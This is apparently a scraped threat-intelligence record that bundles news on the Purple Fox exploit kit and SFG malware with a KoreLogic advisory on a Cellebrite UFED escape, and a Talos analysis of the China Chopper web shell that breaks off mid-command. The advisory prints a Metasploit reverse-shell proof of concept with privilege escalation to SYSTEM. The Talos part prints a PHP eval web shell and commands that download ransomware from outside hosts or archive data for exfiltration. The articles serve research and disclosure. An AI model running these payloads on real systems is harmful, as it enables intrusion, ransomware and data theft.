Purple Fox exploit kit (EK) has added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks \u2013 and researchers say they expect more attacks to be added in the future.\n\nThe Purple Fox EK was [previously analyzed](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) in September, when researchers said that it appears to have been built to [replace the Rig 
EK](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>) in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as [CVE-2020-0674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674>) and [CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>), which were first disclosed at the end of 2019 and early 2020. Purple Fox previously [used exploits](<https://securityintelligence.com/news/purple-fox-malware-spread-by-rig-exploit-kit-capable-of-abusing-powershell/>) targeting older Microsoft flaws, including ones tracked as [CVE-2018-8120](<https://nvd.nist.gov/vuln/detail/CVE-2018-8120>) and [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>).\n\n\u201cThis tells us that the authors of Purple Fox are staying up to date on viable exploitable vulnerabilities and updating when they become available,\u201d said researchers with Proofpoint in a [Monday analysis](<https://www.proofpoint.com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal>). \u201cIt\u2019s reasonable to expect that they will continue to update as new vulnerabilities are discovered.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCVE-2020-0674 is a [critical scripting engine memory corruption](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) vulnerability in Internet Explorer, which was [disclosed](<https://twitter.com/msftsecresponse/status/1218296055579602944>) by Microsoft in a January 2020 out-of-band security advisory. The flaw could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could [gain the same user rights](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) as the current user. 
The flaw was later [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>)as part of the February 2020 Patch Tuesday release. Since then, further analysis of the flaw has been [published](<https://labs.f-secure.com/blog/internet-exploiter-understanding-vulnerabilities-in-internet-explorer>) and proof-of-concept (PoC) code has been [released](<https://github.com/maxpl0it/CVE-2020-0674-Exploit>), said researchers.\n\nCVE-2019-1458 meanwhile is a high-severity [elevation-of-privilege vulnerability](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) in Win32k, which has a zero-day exploit circulating in the wild (used in attacks including [Operation WizardOpium)](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>). The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said. The flaw, which has a CVSS score of 7.8 out of 10, was [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)by Microsoft as part of its December Patch Tuesday release.\n\n## **Purple Fox**\n\nResearchers discovered a malvertising campaign in late June that utilized the Purple Fox EK, successfully exploiting Internet Explorer 11 via CVE-2020-0674 on Windows 10. The exploit used for CVE-2020-0674 targets Internet Explorer\u2019s usage of jscript.dll, a library required for Windows to operate. At the start of the exploit process, the malicious script attempts to leak an address from the RegExp implementation within jscript.dll.\n\nWith that leaked address, the malicious JavaScript code then searches for the PE header of jscript.dll, and then uses that header to locate an import descriptor for kernel32.dll. 
That contains the process and memory manipulation functions required for the EK to load the actual shellcode.\n\n\u201cIn particular, the function GetModuleHandleA is used to obtain the running module handle,\u201d said researchers. \u201cThis handle is used along with GetProcAddress to locate VirtualProtect, which is in turn used to enable \u2018read, write, execute\u2019 (RWX) permissions on the shellcode. Finally, the shellcode is triggered by calling an overwritten implementation of RegExp::test.\u201d\n\nThe shellcode then locates WinExec to create a new process, which begins the actual execution of the malware.\n\n## **EK Future**\n\nWhile exploit kits are [not as popular as they were](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) a few years ago, researchers stress that they are [still part of the](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>) threat landscape, with EKs like [Fallout and Rig continually retooling](<https://threatpost.com/fallout-ek-retools/141027/>).\n\n\u201cOne thing that hasn\u2019t changed regarding exploit kits is the way in which exploit-kit authors regularly update to include new attacks against newly discovered vulnerabilities,\u201d researchers said.\n\nBy building their own EK for distribution, the authors of the Purple Fox malware have been able to save money by no longer paying for the Rig EK. This shows that the attackers behind the Purple Fox malware are taking a \u201cprofessional approach\u201d by looking to save money and keep their product current, researchers said.\n\n\u201cThe fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business,\u201d they said. \u201cIn essence, the authors behind the Purple Fox malware decided to bring development \u2018in-house\u2019 to reduce costs, just like many legitimate businesses do. 
Bringing the distribution mechanism \u2018in-house\u2019 also enables greater control over what the EK actually loads.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-07-06T15:21:30", "published": "2020-07-06T15:21:30", "id": "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "href": "https://threatpost.com/microsoft-exploits-purple-fox-ek/157157/", "type": "threatpost", "title": "Purple Fox EK Adds Microsoft Exploits to Arsenal", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:18:17", "bulletinFamily": "info", "cvelist": ["CVE-2014-4113", "CVE-2015-1701"], "description": "[](<https://3.bp.blogspot.com/-pW4-SBx_J5I/V4YhiNwraPI/AAAAAAAABe8/wIiPg1gsMR8QuzUbm3IVLYyn-kpYJH4dgCLcB/s1600/scada-malware.png>)\n\nSecurity researchers have discovered a new campaign targeting energy companies in Western Europe with sophisticated malware that goes to great lengths to remain undetected. \n \nResearchers from SentinelOne Labs discovered the malware, which has already infected at least one European energy company, is so stealthy and advanced that it is likely to be the work of a wealthy nation. 
\n \nThe malware, dubbed '[SFG](<https://sentinelone.com/blogs/sfg-furtims-parent/>)', contains about 280 kilobytes of code, featuring a vast arsenal of tools rarely seen in ordinary malware samples. It takes \"_extreme measures_\" to cleverly and stealthily evade a large number of security defenses before it drops its payload. \n \nThe malware dismantles antivirus processes one-by-one until the malware is finally safe to uninstall them all. It also encrypts key features of its code so that it cannot be discovered and analyzed. It will not execute itself if it senses it is being run in a sandbox environment. \n \nThe Windows-based malware even takes special care of features such as facial recognition, fingerprint scanners, and other advanced biometric access control systems running inside target organizations. \n \nTo gain administrative access to the infected computer, the malware sample uses a pair of privilege escalation exploits for Windows flaws ([CVE-2014-4113](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4113>) and [CVE-2015-1701](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1701>)) that were patched by Microsoft in October 2014 and May 2015, respectively. \n\n\n> SentinelOne Chief Security Officer Udi Shamir says: \"_The malware has all the hallmarks of a nation-state attack due to its extremely high level of sophistication and the cost associated with creating software of this advanced nature._\"\n\nOnce it has gained administrative control of a computer, the malware surveys the connected network, reports information about the infected network back to its operators, and awaits further instructions, giving attackers a network backdoor on targeted industrial control systems. \n \nThe backdoor could then be used to install other malware on systems for more detailed espionage or _\"extract data or potentially shut down the energy grid,\"_ security researchers warn. 
\n \nThe SFG malware is related to an earlier malware sample dubbed **Furtim** \u2013 another piece of highly sophisticated malware that was [uncovered](<http://blog.ensilo.com/furtim-the-ultra-cautious-malware>) in May \u2013 that's also able to evade antivirus and other security defenses. \n \nThe amount of time, effort, and resources required to create the malware means that it is the work of a team of hackers working for a wealthy nation's government, though the researchers didn't reveal the nation behind the attack. \n\n\n> _\"It appears to be the work of multiple developers who've reverse engineered more than a dozen antivirus solutions and gone to extreme lengths to evade detection, including causing the [antivirus] software to stop working without the user being alerted,\" Shamir wrote._ \n_ \n_ _\"Attacks of this nature require substantial funding and knowhow to pull off and are likely to be the result of a state-sponsored attack, rather than a cybercriminal group.\"_\n\nYou can find more technical details about the SFG malware in a [report](<https://sentinelone.com/blogs/sfg-furtims-parent/>) published by the security firm SentinelOne on Tuesday.\n", "modified": "2016-07-13T11:12:26", "published": "2016-07-13T00:12:00", "id": "THN:675EE08758C0AD2D11F9BC33AB15EA32", "href": "https://thehackernews.com/2016/07/scada-malware-energy.html", "type": "thn", "title": "State-Sponsored SCADA Malware targeting European Energy Companies", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "korelogic": [{"lastseen": "2020-06-11T21:22:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-1701", "CVE-2020-12798"], "description": "Title: Cellebrite Restricted Desktop Escape and Escalation of User Privilege\nAdvisory ID: KL-001-2020-002\nPublication Date: 2020.05.14\nPublication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt\n\n\n1. 
Vulnerability Details\n\n Affected Vendor: Cellebrite\n Affected Product: UFED\n Affected Version: 5.0 - 7.5.0.845\n Platform: Embedded Windows\n CWE Classification: CWE-269: Improper Privilege Management,\n CWE-20: Input Validation Error\n CVE ID: CVE-2020-12798\n\n\n2. Vulnerability Description\n\n The Cellebrite UFED device implements local operating system\n policies that can be circumvented to obtain a command\n prompt. From there, privilege escalation is possible using\n public exploits.\n\n\n3. Technical Description\n\n The Cellebrite UFED device implements local operating system\n policies which are designed to limit access to operating system\n functionality. These include but may not be limited to:\n\n 1. Preventing access to dialogs such as Run, File Browser,\n and Explorer.\n\n and\n\n 2. Preventing access to process and application management tools\n such as Task Manager and the Control Panel.\n\n These policies can be circumvented by using functionality\n that is permitted by the policy governing the use of the user\n desktop. A user can leverage the Wireless Network connection\n string to select certificate-based authentication, which then\n enables file dialogs that are able to be used to launch a\n command prompt. Following this, privileges can be elevated\n using off-the-shelf and publicly available exploits relevant\n to the specific Windows version in use.\n\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has informed KoreLogic that this vulnerability is\n not present on devices manufactured \"at least since 2018.\" The\n vendor was uncertain of the exact version number that remediated\n this attack vector.\n\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\n of KoreLogic, Inc.\n\n\n6. 
Disclosure Timeline\n\n 2020.03.05 - KoreLogic submits vulnerability details to\n Cellebrite.\n 2020.03.17 - Cellebrite acknowledges receipt and the intention\n to investigate.\n 2020.04.16 - KoreLogic requests an update on the status of the\n vulnerability report.\n 2020.04.19 - Cellebrite responds, notifying KoreLogic that the\n vulnerable dialog is not available on newer UFED\n releases. Indicates they will determine when the\n remediation was introduced.\n 2020.05.04 - KoreLogic requests an update from Cellebrite.\n 2020.05.05 - Cellebrite responds that they do not have the\n version number at hand, but does not request\n delaying public disclosure.\n 2020.05.11 - MITRE issues CVE-2020-12798.\n 2020.05.12 - 45 business-days have elapsed since the report was\n submitted to Cellebrite.\n 2020.05.14 - KoreLogic public disclosure.\n\n\n7. Proof of Concept\n\n Begin by using the msfvenom binary to create a meterpreter\n payload that will initiate a remote connection to a C2. Copy\n the payload to a USB drive. 
Following this, use the msfconsole\n binary to create a C2 connection handler with the multi/handler\n functionality.\n\n $ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888\n [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n [-] No arch selected, selecting arch: x86 from the payload\n No encoder or badchars specified, outputting raw payload\n Payload size: 341 bytes\n Final size of exe file: 73802 bytes\n Saved as: payload.exe\n $ sudo mount -o rw /dev/sda1 a/\n $ sudo cp payload.exe a/\n $ sync\n $ sudo umount a/\n $ msfconsole\n [snip]\n msf5 exploit(multi/handler) > show options\n\n Module options (exploit/multi/handler):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n\n\n Payload options (windows/meterpreter/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST [REDACTED] yes The listen address (an interface may be specified)\n LPORT 8888 yes The listen port\n\n\n Exploit target:\n\n Id Name\n -- ----\n 0 Wildcard Target\n\n\n msf5 exploit(multi/handler) > exploit -j -z\n [*] Exploit running as background job 1.\n [*] Exploit completed, but no session was created.\n [*] Started reverse TCP handler on [REDACTED]:8888\n\n Now insert the USB drive where payload.exe resides into a\n target Cellebrite device. Next, follow the steps below:\n\n 1. Open the Wireless Network Connection screen by clicking\n on the WiFi icon in the bottom right hand corner of the\n screen. This should be next to the system clock.\n\n 2. Select \"Change advanced settings\" -- this will bring up a\n screen called Windows Network Connection Properties. Choose\n the Wireless Networks tab.\n\n 3. Under the Preferred networks section, click the Add button\n and then select the Authentication tab. 
Make sure \"Enable IEEE\n 802.1x authentication for this network\" is enabled.\n\n 4. Under EAP Type, select \"Smart Card or other Certificate\"\n and then click the Properties button.\n\n 5. Under Trusted Root Certificate Authorities click the\n View Certificate button. This will bring up a screen called\n Certificate, choose the Details tab and click the \"Copy to\n File\" button. This will bring up a screen called Certificate\n Export Wizard.\n\n 6. Click Next and select any of the available export format\n options. For example, choose the \"DER encoded binary X.509\"\n option and click next.\n\n 7. Instead of typing out a export path click the Browse\n button to open a file dialog. In the \"File Name\" box type:\n \\WINDOWS\\System32\\ and under \"Save as type\" select the \"All\n Files (*.*)\" option. Hit the enter key.\n\n 8. Locate the cmd.exe file then drag and drop any DLL over\n it. For example, choose the clusapi.dll file located near the\n cmd.exe executable. This will open a Command Prompt screen as\n an unprivileged user.\n\n 9. 
Type the drive letter to change into the USB drive containing\n the payload.exe file.\n\n C:\\windows\\system32>D:\n D:\\>payload.exe\n\n This results in a connection back into Metasploit.\n\n [*] Sending stage (180291 bytes) to [REDACTED]\n [*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800\n msf5 exploit(multi/handler) > sessions -i 2\n [*] Starting interaction with 2...\n meterpreter > getuid\n Server username: TOUCH-[REDACTED]\\Operator\n\n An exploit for CVE-2015-1701 is loaded up and configured to run\n a local privilege escalation exploit against the unprivileged\n session and SYSTEM is obtained.\n\n msf5 exploit(windows/local/ms15_051_client_copy_image) > show options\n\n Module options (exploit/windows/local/ms15_051_client_copy_image):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n SESSION yes The session to run this module on.\n\n\n Exploit target:\n\n Id Name\n -- ----\n 0 Windows x86\n\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2\n SESSION => 2\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp\n PAYLOAD => windows/meterpreter/reverse_tcp\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888\n LPORT => 8888\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED]\n LHOST => [REDACTED]\n msf5 exploit(windows/local/ms15_051_client_copy_image) > run\n\n [*] Started reverse TCP handler on [REDACTED]:8888\n [*] Launching notepad to host the exploit...\n [+] Process 3936 launched.\n [*] Reflectively injecting the exploit DLL into 3936...\n [*] Injecting exploit into 3936...\n [*] Exploit injected. Injecting payload into 3936...\n [*] Payload injected. 
Executing exploit...\n [*] Sending stage (180291 bytes) to [REDACTED]\n [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n [*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800\n\n meterpreter > getuid\n Server username: NT AUTHORITY\\SYSTEM\n meterpreter >", "edition": 1, "modified": "2020-05-14T00:00:00", "published": "2020-05-14T00:00:00", "id": "KL-001-2020-002", "href": "https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt", "title": "Cellebrite Restricted Desktop Escape and Escalation of User Privilege", "type": "korelogic", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-1684", "CVE-2015-1676", "CVE-2015-1715", "CVE-2015-1692", "CVE-2015-1706", "CVE-2015-1695", "CVE-2015-1696", "CVE-2015-1709", "CVE-2015-1698", "CVE-2015-1705", "CVE-2015-1688", "CVE-2015-1689", "CVE-2015-1691", "CVE-2015-1675", "CVE-2015-1677", "CVE-2015-1671", "CVE-2015-1708", "CVE-2015-1697", "CVE-2015-1710", "CVE-2015-1686", "CVE-2015-1679", "CVE-2015-1681", "CVE-2015-1678", "CVE-2015-1673", "CVE-2015-1718", "CVE-2015-1704", "CVE-2015-1685", "CVE-2015-1703", "CVE-2015-1658", "CVE-2015-1714", "CVE-2015-1717", "CVE-2015-1701", "CVE-2015-1694", "CVE-2015-1713", "CVE-2015-1716", "CVE-2015-1674", "CVE-2015-1670", "CVE-2015-1680", "CVE-2015-1702", "CVE-2015-1711", "CVE-2015-1712", "CVE-2015-1672", "CVE-2015-1699"], "description": "Buffer overflow, memory corruption, code execution, privilege escalation, restrictions bypass, DoS, information disclosure.", "edition": 1, "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "id": "SECURITYVULNS:VULN:14492", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14492", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2019-08-27T16:21:09", "bulletinFamily": "blog", "cvelist": ["CVE-2015-0062", "CVE-2015-1701", "CVE-2016-0099", "CVE-2018-8440"], "description": "_By [Paul Rascagneres](<https://www.twitter.com/r00tbsd>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._ \n \n\n\n[](<https://1.bp.blogspot.com/-jBq3FQDBVOA/XVF6aa_P4RI/AAAAAAAAATA/Ct_1ZK5SbSgWnN5H9DtyHPTOZDZtrGZRwCLcBGAs/s1600/image3.jpg>)\n\n### Introduction\n\nThreats will commonly fade away over time as they're discovered, reported on, and detected. But China Chopper has found a way to stay relevant, active and effective nine years after its initial discovery. [China Chopper](<https://attack.mitre.org/software/S0020/>) is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target. Several threat groups have used China Chopper, and over the past two years, we've seen several different campaigns utilizing this web shell and we chose to document three most active campaigns in this blog post. \n \nWe decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack against telecommunications providers called [\"Operation Soft Cell,\"](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>) which reportedly utilized China Chopper. Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which shows that even nine years after its creation, attackers are using China Chopper without significant modifications. \n \nThis web shell is widely available, so almost any threat actor can use. This also means it's nearly impossible to attribute attacks to a particular group using only presence of China Chopper as an indicator. 
\n \nThe usage of China Chopper in recent campaigns proves that a lot of old threats never really die, and defenders on the internet need to be looking out for malware both young and old. \n \n \n\n\n### What is China Chopper?\n\nChina Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool. The web shell works on different platforms, but in this case, we focused only on compromised Windows hosts. China Chopper is a tool that has been used by some state-sponsored actors such as [Leviathan](<https://attack.mitre.org/groups/G0065/>) and [Threat Group-3390](<https://attack.mitre.org/groups/G0027/>), but during our investigation we've seen actors with varying skill levels. \n \nIn our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised with China Chopper web shells. We do not have additional data about how the web shell was installed, but there are several web application frameworks such as older versions of Oracle WebLogic or WordPress that may have been targeted with known remote code execution or file inclusion exploits. \n \nChina Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and generate server-side code that must be added to the targeted website code in order to communicate. \n \n\n\n[](<https://1.bp.blogspot.com/-Dv9InEUHyds/XVF6hgNog_I/AAAAAAAAATE/DkXog3y-iSgj7xMraPu4RAL6xNYnXg0DwCLcBGAs/s1600/image9.png>)\n\n_China Chopper GUI_\n\n \nThe server-side code is extremely simple and contains, depending on the application platform, just a single line of code. The backdoor supports .NET Active Server Pages or PHP. 
\n \nHere is an example of server-side code for a compromised PHP application: \n \n\n \n \n <?php @eval($_POST['test']);?>\n\n \nWe cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper developers to make detection more difficult, but using pattern matching on such a short snippet may produce some false positive detections. \n \nThe China Chopper client communicates with affected servers using HTTP POST requests. The only function of the server-side code is to evaluate the request parameter specified during the configuration of the server code in the client GUI. In our example, the expected parameter name is \"test.\" The communication over HTTP can be easily spotted in the network packet captures. \n \nChina Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of 'netstat an|find \"ESTABLISHED.\"' and it is very likely that this command will be seen in process creation logs on affected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-JIbBgJHZZEI/XVF6rJ5F1TI/AAAAAAAAATM/G8POGJS2rcsVQhyjqhmPf52Qx7q3wWzDgCLcBGAs/s1600/image4.png>)\n\n_China Chopper's first suggested Terminal command_\n\n \nWhen we analyze the packet capture, we can see that the parameter \"test\" contains another eval statement. \n \nDepending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are encoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse other parameters, launch requested commands and return the results to the client. 
\n \n\n \n \n test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D\n\n \nEncoded China Chopper POST request with parameters \n \nIn this request, the decoded parameters are: \n\n \n \n z0 - @ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\"->|\");;$p=base64_decode($_POST[\"z1\"]);$s=base64_decode($_POST[\"z2\"]);$d=dirname($_SERVER[\"SCRIPT_FILENAME\"]);$c=substr($d,0,1)==\"/\"?\"-c \\\"{$s}\\\"\":\"/c \\\"{$s}\\\"\";$r=\"{$p} {$c}\";@system($r.\" 2>&1\",$ret);print ($ret!=0)?\" \n ret={$ret} \n \":\"\";;echo(\"|<-\");die(); \n \n z1 - cmd \n \n z2 - cd /d \"C:\\xampp\\htdocs\\dashboard\\\"&netstat -an | find \"ESTABLISHED\"&echo [S]&cd&echo [E]\n\n \nThe end of the command \"&echo [S]&cd&echo [E]\" seems to be present in all virtual terminal requests and may be used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs. \n \nApart from the terminal, China Chopper includes a file manager (with the ability to create directories, download files and change file metadata), a database manager and a rudimentary vulnerability scanner. \n \nWhat follows is our view into three different compromises, each with different goals, tools, techniques and likely different actors. 
\n \n\n\n[](<https://1.bp.blogspot.com/-_fwmst4cxsc/XVF60IYW4iI/AAAAAAAAATU/NkngLjkJvIk-VOhc8eaB2PyyJZYtFjGFQCLcBGAs/s1600/image7.jpg>)\n\n_Timeline of the observed case studies_\n\n \n\n\n### Case study No. 1: Espionage context\n\nWe identified the usage of China Chopper in a couple of espionage campaigns. Here, we investigate a campaign targeting an Asian government organization. In this campaign, China Chopper was used in the internal network, installed on a few web servers used to store potentially confidential documents. \n \nThe purpose of the attacker was to obtain documents and database copies. The documents were automatically compressed using WinRAR: \n \n\n \n \n cd /d C:\\Windows\\Working_Directory\\ \n renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.xlsx -n*.ppt -n*.pptx -r c:\\output_directory\\files.rar c:\\directory_to_scan\\\n\n \nThis command is used to create an archive containing documents modified after the date put as an argument. The archives are protected with a strong password containing uppercase, lowercase and special characters. The passwords were longer than 15 characters. \n \nWe assume the attacker ran this command periodically in order to get only new documents and minimize the quantity of exfiltrated data. \n \nOn the same target, we identified additional commands executed with China Chopper using WinRAR: \n \n\n \n \n rar a -inul -ed -r -m3 -taDate -hp<profanity> ~ID.tmp c:\\directory_to_scan\n\n \nChina Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before. But the rar command line here is sufficiently different to note that it could be a different actor. The actor used an offensive phrase for a password, which is why we've censored it here. 
\n \nThe attacker deployed additional tools to execute commands on the system: \n \n\n \n \n C:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe C:\\windows\\temp\\Document.csproj /p:AssemblyName=C:\\windows\\temp\\downloader.png /p:ScriptFile=C:\\windows\\temp\\downloader.dat /p:Key=27_characters_key > random.tmp\n\n \nMSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument contains a PowerShell script encrypted with the value of the key argument. Here is the .NET code: \n \n\n\n[](<https://1.bp.blogspot.com/-fyO_pE90tKU/XVF69g6-T_I/AAAAAAAAATc/oNWFm6VZqzsbSD0gCuU9kSQG3hgkxo89QCLcBGAs/s1600/image2.png>)\n\n_.NET loader code_\n\n \nThe .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request, the loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded file and executes it: \n \n\n\n[](<https://1.bp.blogspot.com/-vmu9ILGV2K8/XVF7Hn-FSlI/AAAAAAAAATg/zTv_Bi3jlOU0LwMI17ylxLF_QQOSah_iwCLcBGAs/s1600/image5.png>)\n\n_Hardcoded User-Agent strings_\n\n \nIn our case, the purpose of the decrypted payload was to perform a database dump: \n \n\n \n \n powershell.exe -exe bypass -nop -w hidden -c Import-Module C:\\windows\\help\\help\\helper.ps1; \n Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName; \n Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump\n\n \nThe \"where UID\" condition in the SQL query has the same purpose as the date in the previous WinRAR command. We assume the attacker performs the query periodically and does not want to dump the entire database, but only the new entries. 
It is interesting to see that after dumping the data, the attacker checks if the generated file is available and if it contains any data: \n \n\n \n \n dir /O:D c:\\working_directory\\db.csv \n powershell -nop -exec bypass Get-Content \"c:\\working_directory\\db.csv\" | Select-Object -First 10\n\n \nHow are the file archives and the database dumps exfiltrated? Since the targeted server is in an internal network, the attacker simply maps a local drive and copies the file to it. \n \n\n \n \n cd /d C:\\working_directory\\ \n net use \\192.168.0.10\\ipc$ /user:USER PASSWORD \n move c:\\working_directory\\db.csv \\192.168.0.10\\destination_directory\n\n \nThe attacker must have access to the remote system in order to exfiltrate data. We already saw the usage of a HTTP tunnel tool to create a network tunnel between the infected system and a C2 server. \n \n\n\n### Case No. 2: Multi-purpose campaign\n\nWe observed another campaign targeting an organisation located in Lebanon. While our first case describes a targeted campaign with the goal to exfiltrate data affecting internal servers, this one is the opposite: an auxiliary public web site compromised by several attackers for different purposes. \n \nWe identified actors trying to deploy ransomware on the vulnerable server using China Chopper. 
The first attempt was Sodinokibi ransomware: \n \n\n \n \n certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\\Users\\UserA\\AppData\\Local\\Temp\\radm.exe\n\n \nThe second delivered the [Gandcrab ransomware](<https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html>): \n \n\n \n \n If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ \n Start-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33')); \n Invoke-ACAXGZFTTDUDKY; \n Start-Sleep -s 1000000;\" \n } else { \n IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33')); \n Invoke-ACAXGZFTTDUDKY; \n Start-Sleep -s 1000000; \n }\n\n \nHere is the script hosted on Pastebin: \n \n\n\n[](<https://1.bp.blogspot.com/-Y3yXMFaOJ7w/XVF7ZZ8jIaI/AAAAAAAAATs/x5YmFtUD_1AjX2R5uGHlRGvsXiXEkAz5ACLcBGAs/s1600/image8.png>)\n\n_Reflective loader downloaded from pastebin.com_\n\n \nThe script executes a hardcoded PE file \u2014 Gandcrab \u2014 located at the end of the script using a reflective DLL-loading technique. \n \nIn addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable server with China Chopper: \n \n\n \n \n Powershell -Command -windowstyle hidden -nop 